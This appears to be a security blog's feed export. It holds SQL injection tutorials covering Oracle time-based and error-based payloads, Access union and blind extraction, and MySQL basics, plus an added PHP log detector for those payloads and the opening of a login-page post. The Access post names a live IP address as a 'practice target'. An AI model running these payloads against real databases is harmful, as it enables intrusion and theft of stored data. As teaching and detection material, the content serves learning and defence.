<p>The instr function finds the position of a given substring within a string. For example:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">select</span> instr(<span class="hljs-string">'abcdefgh'</span>,<span class="hljs-string">'de'</span>) position <span class="hljs-keyword">from</span> dual<br></code></pre></td></tr></table></figure>
<p>The result is 4, because counting from 1, d is in fourth place, so 4 is returned.</p>
<p>Use in injection: <code>?id=1 and 1=(instr((select user from dual),'SYS')) --</code></p>
<p>0x03 Character-by-character guessing (same as before, not repeated here)</p>
<h4 id="时间盲注-1"><a href="#时间盲注-1" class="headerlink" title="Time-based blind injection"></a>Time-based blind injection</h4>
<p>Time-based blind injection in Oracle usually uses DBMS_PIPE.RECEIVE_MESSAGE(); the other option is to combine decode() with an expensive SQL operation (case, if and similar constructs combined with an expensive operation also work). An expensive operation here means something like <code>(select count(*) from all_objects)</code>, a query or other processing over a large amount of data in the database, which takes noticeable time; data is then extracted through this timing. This approach also applies to other databases.</p>
<p>0x01 Blind injection with the DBMS_PIPE.RECEIVE_MESSAGE function</p>
<p>The DBMS_LOCK.SLEEP() function can put a procedure to sleep for a number of seconds, but there are many restrictions on using it.</p>
<p>First, it cannot be injected directly into a subquery, because Oracle does not support stacked queries. Second, only database administrators can use the DBMS_LOCK package.</p>
<p>There is a better way in Oracle PL/SQL: a delay can be injected inline with the following call: <code>dbms_pipe.receive_message('RDS', 10)</code></p>
<p>The DBMS_PIPE.RECEIVE_MESSAGE function waits 10 seconds for data returned from the RDS pipe. By default the package is executable with public privileges. Unlike DBMS_LOCK.SLEEP(), it is a function that can be used inside a SQL statement.</p>
<p>Use in injection:</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">-1</span> <span class="hljs-keyword">or</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span> dbms_pipe.receive_message(<span class="hljs-string">'RDS'</span>, <span class="hljs-number">10</span>)<span class="hljs-comment">--</span><br>?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span>dbms_pipe.receive_message(<span class="hljs-string">'RDS'</span>, <span class="hljs-number">10</span>)<span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure>
<p>If the page takes 10 seconds to return, injection exists. For now this can be read as DBMS_PIPE.RECEIVE_MESSAGE('any value', delay in seconds).</p>
<p>0x02 Blind injection with the decode function</p>
<p>decode can be used not only in boolean blind injection but in time-based blind injection too.</p>
<p>Add a delay statement to the decode injection; here we insert our dbms_pipe.receive_message function.</p>
<p>For example: <code>?id=1 and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',5),0) from dual) --</code></p>
<p>The delay need not come from a delay function; a query that takes longer because it enumerates every object in the database works too.</p>
<p>For example: <code>?id=1 and 1=(select decode(substr(user,1,1),'S',(select count(*) from all_objects),0) from dual) and '1'='1'</code></p>
<p>This obvious time difference likewise reveals the result of the injected expression.</p>
<h4 id="报错注入-1"><a href="#报错注入-1" class="headerlink" title="Error-based injection"></a>Error-based injection</h4>
<p>Error-based injection requires a form such as 1=[error statement] or 1>[error statement], i.e. using a comparison operator (in MySQL the error function alone suffices), similar to mssql error-based injection.</p>
<p><strong>Error-based injection with utl_inaddr.get_host_name()</strong></p>
<p>utl_inaddr.get_host_address is meant to obtain an IP address, but if the argument passed cannot be resolved it returns an Oracle error that displays the argument.</p>
<p>Since what we pass is a SQL statement, what comes back is the statement's result. After startup, Oracle places various system variables in specific views, which can be used to obtain what we want.</p>
<p>For example, to dump the current user: <code>?id=1 and 1=utl_inaddr.get_host_name((select user from dual))--</code></p>
<p><strong>Error-based injection with ctxsys.drithsx.sn()</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span>ctxsys.drithsx.sn(<span class="hljs-number">1</span>,(<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> dual)) <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure>
<p><strong>Error-based injection with XMLType()</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> <span class="hljs-built_in">upper</span>(XMLType(chr(<span class="hljs-number">60</span>)<span class="hljs-operator">%</span><span class="hljs-number">7</span>c<span class="hljs-operator">%</span><span class="hljs-number">7</span>cchr(<span class="hljs-number">58</span>)<span class="hljs-operator">%</span><span class="hljs-number">7</span>c<span class="hljs-operator">%</span><span class="hljs-number">7</span>c(<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> dual)<span class="hljs-operator">%</span><span class="hljs-number">7</span>c<span class="hljs-operator">%</span><span class="hljs-number">7</span>cchr(<span class="hljs-number">62</span>))) <span class="hljs-keyword">from</span> dual) <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">null</span> <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure>
<p><strong>Error-based injection with dbms_xdb_version.checkin()</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> dbms_xdb_version.checkin((<span class="hljs-keyword">select</span> banner <span class="hljs-keyword">from</span> sys.v_$version <span class="hljs-keyword">where</span> rownum<span class="hljs-operator">=</span><span class="hljs-number">1</span>)) <span class="hljs-keyword">from</span> dual) <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">null</span> <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure>
<p><strong>Error-based injection with dbms_xdb_version.makeversioned()</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> dbms_xdb_version.makeversioned((<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> dual)) <span class="hljs-keyword">from</span> dual) <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">null</span> <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure>
<p><strong>Error-based injection with dbms_xdb_version.uncheckout()</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> dbms_xdb_version.uncheckout((<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> dual)) <span class="hljs-keyword">from</span> dual) <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">null</span> <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure>
<p><strong>Error-based injection with dbms_utility.sqlid_to_sqlhash()</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> (<span class="hljs-keyword">SELECT</span> dbms_utility.sqlid_to_sqlhash((<span
class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> dual)) <span class="hljs-keyword">from</span> dual) <span class="hljs-keyword">is</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">null</span> <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure><p><strong>ordsys.ord_dicom.getmappingxpath()进行报错注入</strong></p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">?id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> <span class="hljs-number">1</span><span class="hljs-operator">=</span>ordsys.ord_dicom.getmappingxpath((<span class="hljs-keyword">select</span> <span class="hljs-keyword">user</span> <span class="hljs-keyword">from</span> dual),<span class="hljs-keyword">user</span>,<span class="hljs-keyword">user</span>)<span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure><p><strong>decode()进行报错注入</strong></p><p>这种方式更偏向布尔盲注,因为这种方式并不会通过报错把查询结果回显回来,仅是用来作为页面的表现不同的判断方法。</p><h4 id="其它方式-1"><a href="#其它方式-1" class="headerlink" title="其它方式"></a>其它方式</h4><p>sqlmap一把梭,或者超级SQL注入工具。如果遇到waf拦截,则需要修改sqlmap的脚本。</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>脚本小子yyds!</p>]]></content>
<categories>
<category>Web Security</category>
</categories>
<tags>
<tag>SQL Injection</tag>
</tags>
</entry>
<entry>
<title>SQL Injection (Part 2) -- Access Injection</title>
<link href="/2021/08/05/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%BA%8C%EF%BC%89-Access%E6%B3%A8%E5%85%A5/"/>
<url>/2021/08/05/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%BA%8C%EF%BC%89-Access%E6%B3%A8%E5%85%A5/</url>
<content type="html"><![CDATA[<h1 id="Access数据库注入"><a href="#Access数据库注入" class="headerlink" title="Access数据库注入"></a>Access Database Injection</h1><h2 id="数据库简介"><a href="#数据库简介" class="headerlink" title="数据库简介"></a>Database overview</h2><p>Microsoft Office Access is a relational database management system published by Microsoft. It combines the Microsoft Jet Database Engine with a graphical user interface and is one of the programs in the Microsoft Office suite.</p><p>In other words, it is Microsoft's database management system that bundles a graphical front end for the database engine together with software development tools.</p><p>Note: an Access deployment has only one database, and it is usually paired with ASP/ASPX as the scripting language.</p><h2 id="数据库结构"><a href="#数据库结构" class="headerlink" title="数据库结构"></a>Database structure</h2><p>Database (only one) -> table -> column -> value</p><h2 id="判断数据库类型"><a href="#判断数据库类型" class="headerlink" title="判断数据库类型"></a>Identifying the database type</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> <span class="hljs-built_in">count</span>(<span class="hljs-operator">*</span>) <span class="hljs-keyword">from</span> msysobjects)<span class="hljs-operator">></span><span class="hljs-number">0</span><br></code></pre></td></tr></table></figure><p>msysobjects is a table unique to Access, and it cannot be accessed from outside. If this errors, the backend is Access; if it behaves normally, it is MSSQL (i.e. SQL Server).</p><p>Access has no comment characters, however, so the only option is %00 truncation. If magic quotes are enabled in PHP, the query content has to be converted to hexadecimal.</p><h2 id="开始注入"><a href="#开始注入" class="headerlink" title="开始注入"></a>Starting the injection</h2><h3 id="注入方法"><a href="#注入方法" class="headerlink" title="注入方法"></a>Injection methods</h3><ul><li>Union-based query</li><li>Character-by-character guessing (blind injection)</li></ul><h3 id="联合查询详细步骤"><a href="#联合查询详细步骤" class="headerlink" title="联合查询详细步骤"></a>Union query, step by step</h3><p>1. Check for an injection point: submit a single quote or use a logical test</p><p>For example:</p><p>Single quote: <code>URL?id=1'</code>; if it errors, there is an injection point</p><p>Logical test: if <code>URL?id=1' and 1=1#</code> behaves normally and <code>URL?id=1' and 1=2#</code> errors, there is an injection point</p><p>2. Determine the number of columns (列名数 in the payload below stands for the column count)</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">URL?id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">' order by 列名数</span><br></code></pre></td></tr></table></figure><p>Taking this <a href="http://103.85.87.93:10000/Production/PRODUCT_DETAIL.asp?id=1513">practice target</a> as an example: order by 22 behaves normally and order by 23 errors, so the query has 22 columns.</p><p>3. Guess the table name (表名)</p><p>If you guess it, continue with a union query: <code>URL?id=1513' union select 1,2,......,22 from 表名</code>; if you cannot guess it, tough luck (though the site's source code can help with guessing). This reveals positions 3 and 15 as the displayed columns; then replace the 3 and 15 above with what you want to query.</p><p>4. Guess the column names</p><p>(essentially the same as above)</p><p>5. Dump the data</p><p>Once the column names are guessed, the data comes back.</p><h3 id="布尔盲注详细步骤"><a href="#布尔盲注详细步骤" class="headerlink" title="布尔盲注详细步骤"></a>Boolean-based blind injection, step by step</h3><p>Boolean-based blind injection applies when the page has no field that echoes data (so union queries are not an option) but it does respond differently for true and false. You build SQL in which keywords such as and and or make the trailing expression true or false, the page returns true or false accordingly, and that is what leaks the information. Commonly used functions include <code>ascii(),mid(),substr(),group_concat(),length()</code>.</p><p>1. Identify the injection point and database type</p><p>(same as for union queries)</p><p>2. Guess the table name (表名)</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span> <span class="hljs-number">0</span> <span class="hljs-operator"><></span>(<span class="hljs-keyword">select</span> <span class="hljs-built_in">count</span>(<span class="hljs-operator">*</span>)<span class="hljs-keyword">from</span> 表名)<br></code></pre></td></tr></table></figure><p>Here <> means not equal; if the page behaves normally, the table exists.</p><p>3. Guess the number of records</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> <span class="hljs-built_in">count</span>(<span class="hljs-operator">*</span>) <span class="hljs-keyword">from</span> 表名)<span class="hljs-operator">=</span>n<br></code></pre></td></tr></table></figure><p>If normal, there are n records.</p><p>4. Guess the column (field) names (列名)</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> <span class="hljs-built_in">count</span>(<span class="hljs-operator">*</span>) <span class="hljs-keyword">from</span> 表名 <span class="hljs-keyword">where</span> len(列名)<span class="hljs-operator">></span><span class="hljs-number">0</span>)<span class="hljs-operator">=</span><span class="hljs-number">1</span><br></code></pre></td></tr></table></figure><p>If normal, the column exists.</p><p>5. Guess the data length</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> <span class="hljs-built_in">count</span>(<span class="hljs-operator">*</span>) <span class="hljs-keyword">from</span> 表名 <span class="hljs-keyword">where</span> len(列名)<span class="hljs-operator">></span>n)<span class="hljs-operator">=</span><span class="hljs-number">1</span><br></code></pre></td></tr></table></figure><p>If normal, the value in that column has length n. Passwords are usually stored as MD5, so 16 or 32 are the usual guesses.</p><p>6. Dump the data (位数 is the character position, ascii值 the ASCII value being tested)</p><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> top <span class="hljs-number">1</span> <span class="hljs-keyword">asc</span>(mid(admin,位数,<span class="hljs-number">1</span>)) <span class="hljs-keyword">from</span> admin) <span class="hljs-operator">=</span>ascii值<br></code></pre></td></tr></table></figure><p>If normal, convert the ASCII value to its character using an ASCII table.</p><h3 id="时间盲注详细步骤"><a href="#时间盲注详细步骤" class="headerlink" title="时间盲注详细步骤"></a>Time-based blind injection, step by step</h3><p>Time-based blind injection is similar to boolean-based: what follows <code>and</code> is replaced with <code>if(查询语句,sleep(5),0)</code> (查询语句 being the query), so it is not repeated here. If the if condition (the database query) holds, the database sleeps for 5 seconds; otherwise the page is unchanged.</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>Union queries are fast but not widely applicable; character-by-character guessing is slow and tedious but works almost everywhere. Because Access can only be attacked by brute-force guessing, column names often cannot be guessed; in that case offset injection can be used, and when a table name cannot be guessed, social engineering can. For boolean-based and time-based blind injection we usually go semi-automatic with Burp Suite, and if you can, pair it with a proxy pool so that the volume of requests does not get your IP banned.</p>]]></content>
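<![CDATA[
Added example for this page (not code from either post): a small PHP checker that flags, in constructed access-log lines, the Oracle error-based and time-based function names listed in the Oracle post together with the msysobjects fingerprint and the order-by / asc(mid()) enumeration from the Access post. The log layout (method, path, status, response time in ms) and the 4-second slow-response threshold are assumptions.

```php
<?php
// Added example (not from the original posts): flag the Oracle and Access
// injection probes described above in web server access-log lines.
// The log lines below are constructed; the layout is an assumed
// "METHOD PATH STATUS RESPONSE_MS" format, not any real server's log.
declare(strict_types=1);

const ORACLE_FUNCTIONS = [
    'dbms_pipe.receive_message',
    'utl_inaddr.get_host_name',
    'utl_inaddr.get_host_address',
    'ctxsys.drithsx.sn',
    'xmltype(',
    'dbms_xdb_version.checkin',
    'dbms_xdb_version.makeversioned',
    'dbms_xdb_version.uncheckout',
    'dbms_utility.sqlid_to_sqlhash',
    'ordsys.ord_dicom.getmappingxpath',
    'from all_objects',
];

const ACCESS_PROBES = [
    'msysobjects',   // Access-only system table used to fingerprint the backend
    'order by ',     // column-count enumeration; noisy alone, telling in a sequence
    'asc(mid(',      // character-by-character extraction
];

const SLOW_RESPONSE_MS = 4000;  // dbms_pipe.receive_message('RDS', 5) delays about 5 s

/**
 * Classify one log line. Returns a list of reasons; an empty list means clean.
 */
function classifyRequest(string $line): array
{
    $parts = preg_split('/\s+/', trim($line));
    if (count($parts) < 4) {
        return ['unparseable line'];
    }
    [, $path, , $responseMs] = $parts;

    // Decode twice so that double-encoded input and %7c (the '|' used by
    // the XMLType payload) are compared in plain text, then lower-case.
    $query = strtolower(urldecode(urldecode($path)));
    $reasons = [];

    foreach (ORACLE_FUNCTIONS as $needle) {
        if (strpos($query, $needle) !== false) {
            $reasons[] = "oracle function: $needle";
        }
    }
    foreach (ACCESS_PROBES as $needle) {
        if (strpos($query, $needle) !== false) {
            $reasons[] = "access probe: $needle";
        }
    }
    // A long response on a request that carries a delay primitive is the
    // time-based pattern; the threshold is an assumption for this example.
    $hasDelayPrimitive = strpos($query, 'dbms_pipe') !== false
        || strpos($query, 'decode(') !== false;
    if ($hasDelayPrimitive && (int) $responseMs >= SLOW_RESPONSE_MS) {
        $reasons[] = "slow response ({$responseMs} ms) with delay primitive";
    }
    return $reasons;
}

// Constructed sample requests: the first three mirror payloads from the posts,
// the last one is an ordinary page view.
$sampleLog = [
    "GET /item.asp?id=1%20and%201=(select%20decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',5),0)%20from%20dual)%20-- 200 5120",
    "GET /item.asp?id=1%20and%20(select%20upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select%20user%20from%20dual)%7c%7cchr(62)))%20from%20dual)%20is%20not%20null%20-- 500 90",
    "GET /PRODUCT_DETAIL.asp?id=1513%20and%20(select%20count(*)%20from%20msysobjects)%3E0 500 40",
    "GET /PRODUCT_DETAIL.asp?id=1513 200 35",
];

foreach ($sampleLog as $line) {
    $reasons = classifyRequest($line);
    echo ($reasons ? 'SUSPICIOUS' : 'ok'), ' ', $line, PHP_EOL;
    foreach ($reasons as $reason) {
        echo '    - ', $reason, PHP_EOL;
    }
}
```

The first line is flagged twice (dbms_pipe.receive_message plus the 5120 ms response), the second on xmltype(, the third on msysobjects, and the plain request passes.
]]>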
<categories>
<category>Web Security</category>
</categories>
<tags>
<tag>SQL Injection</tag>
</tags>
</entry>
<entry>
<title>SQL Injection (Part 1) -- Principles and Basics</title>
<link href="/2021/07/28/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%B8%80%EF%BC%89-%E5%8E%9F%E7%90%86%E4%BB%8B%E7%BB%8D%E5%92%8C%E5%9F%BA%E7%A1%80/"/>
<url>/2021/07/28/SQL%E6%B3%A8%E5%85%A5%EF%BC%88%E4%B8%80%EF%BC%89-%E5%8E%9F%E7%90%86%E4%BB%8B%E7%BB%8D%E5%92%8C%E5%9F%BA%E7%A1%80/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>I have just finished studying the "front-end trio", and on the web track we are starting on SQL injection. Personally I find SQL injection a hard topic for beginners, and CTF challenges on it can be intimidating, so here is a brief rundown of what newcomers should pay attention to.</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>Main text</h2><h3 id="0x01-SQL注入原理介绍"><a href="#0x01-SQL注入原理介绍" class="headerlink" title="0x01 SQL注入原理介绍"></a>0x01 How SQL injection works</h3><p>When a web application sends SQL statements to its backend database and the user-supplied parameters are not strictly filtered, an attacker can craft special SQL that is passed straight to the database engine for execution, reading or modifying the data in the database.</p><p>So the essence of a SQL injection vulnerability is that user-supplied data gets executed as code.</p><p>Two conditions are needed for SQL injection: the user controls the input, and the web application carries that input into the database for execution.</p><h3 id="0x02-SQL注入基础"><a href="#0x02-SQL注入基础" class="headerlink" title="0x02 SQL注入基础"></a>0x02 SQL injection basics</h3><h4 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>Commonly used functions</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-built_in">system_user</span>(): system user name<br><br><span class="hljs-keyword">user</span>(): user name<br><br><span class="hljs-built_in">current_user</span>(): current user name<br><br><span class="hljs-built_in">session_user</span>(): user name of the database connection<br><br>database(): database name<br><br>version(): MySQL version<br><br>load_file(): MySQL function that reads a local file (the path is passed as hex or decimal)<br><br>@<span class="hljs-variable">@datadir</span>: database data directory<br><br>@<span class="hljs-variable">@basedir</span>: MySQL installation path<br><br>@<span class="hljs-variable">@version</span>_compile_os: operating system<br><br>group_concat(): concatenates all the arguments in the parentheses into one string<br><br>substr(str,<span class="hljs-keyword">start</span>,length): the substring of str beginning at <span class="hljs-keyword">start</span> with length length<br></code></pre></td></tr></table></figure><h4 id="必记的一库三表"><a href="#必记的一库三表" class="headerlink" title="必记的一库三表"></a>One database and three tables you must remember</h4><p>The database: information_schema (a MySQL default database)</p><p>The three tables:</p><p>0x01 SCHEMATA: information about every database in the MySQL instance</p><ul><li>schema_name (column): database name</li></ul><p>0x02 TABLES: information about every table in the MySQL instance</p><ul><li><p>TABLE_NAME (column): table name</p></li><li><p>TABLE_SCHEMA (column): the database the table belongs to</p></li></ul><p>0x03 COLUMNS: every column of every table in the MySQL instance</p><ul><li>COLUMN_NAME (column): column name</li><li>TABLE_NAME (column): the table the column belongs to</li><li>TABLE_SCHEMA (column): the database that holds the table this column belongs to</li></ul><p><strong>Note: these three tables live in the information_schema database, so during SQL injection you cannot name the table on its own; use the "database.table" form, for example information_schema.tables</strong>.</p>]]></content>
<categories>
<category>Web Security</category>
</categories>
<tags>
<tag>SQL Injection</tag>
</tags>
</entry>
<entry>
<title>A Simple Login Page</title>
<link href="/2021/07/19/%E7%AE%80%E5%8D%95%E7%9A%84%E7%99%BB%E5%BD%95%E9%A1%B5%E9%9D%A2/"/>
<url>/2021/07/19/%E7%AE%80%E5%8D%95%E7%9A%84%E7%99%BB%E5%BD%95%E9%A1%B5%E9%9D%A2/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h2><p>In my previous article I covered the preparation for building a site locally, including creating the MySQL database. Now I will walk through writing the registration and login pages in detail. Please read the comments in the source code carefully! The MySQL side only involves CRUD on a single table, so it is not very hard.</p><p>P.S. The following semester was too busy for updates, and only the summer break left time to write this up. The pages were built months ago, so I may not remember every step clearly; if anything is unclear, ask in the comments and I will do my best to answer!</p><h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>Main text</h2><p>I am not good at CSS, so I borrowed a template from Taobao. There was no template for registration and password change, so those are the plainest possible HTML pages!</p><p>Enough talk, here is the code!</p><p>1. Login</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span 
class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span 
class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br></pre></td><td class="code"><pre><code class="hljs php+HTML">//index.html<br><!DOCTYPE html><br><html><br><br><head><br><br><title>登录页面(样例)</title><br><br><meta name="keywords" content="登录界面素材" /><br><br><meta name="description" content="none" /><br><br><meta name="viewport" 
content="width=device-width, initial-scale=1"><br><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br><script<br>type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } </script><br><!-- Custom Theme files --><br><link href="css/style.css" rel="stylesheet" type="text/css" media="all" /><br><!-- //Custom Theme files --><br></head><br><br><body><br><!-- main --><br><div class="main-w3layouts wrapper"><br><h1>登录页面</h1><br><div class="main-agileinfo"><br><div class="agileits-top"><br><form action="登录.php" method="post"><br><input class="text" type="text" name="Username" placeholder="用户名" required=""><br><input class="text" type="password" name="Password" placeholder="密码" required=""><br><div class="wthree-text"><br><ul><br><li><br><label class="anim"><br><input type="checkbox" class="checkbox"><br><span> 记住我?(别点了,记不住的)</span><br></label><br></li><br><li><a href="修改密码.html">忘记密码?</a> </li><br></ul><br><div class="clear"> </div><br></div><br><input type="submit" value="登录" ><br></form><br><p>没有账号? <a href="注册.html" id="register"> 现在注册一个!</a></p><br><script><br> var register=document.getElementById('register');<br>register.addEventListener('click',function(){<br>location.href='注册.html';<br>})<br></script><br></div><br></div><br><!-- copyright --><br><div class="w3copyright-agile"><br><p>© 2021 <a 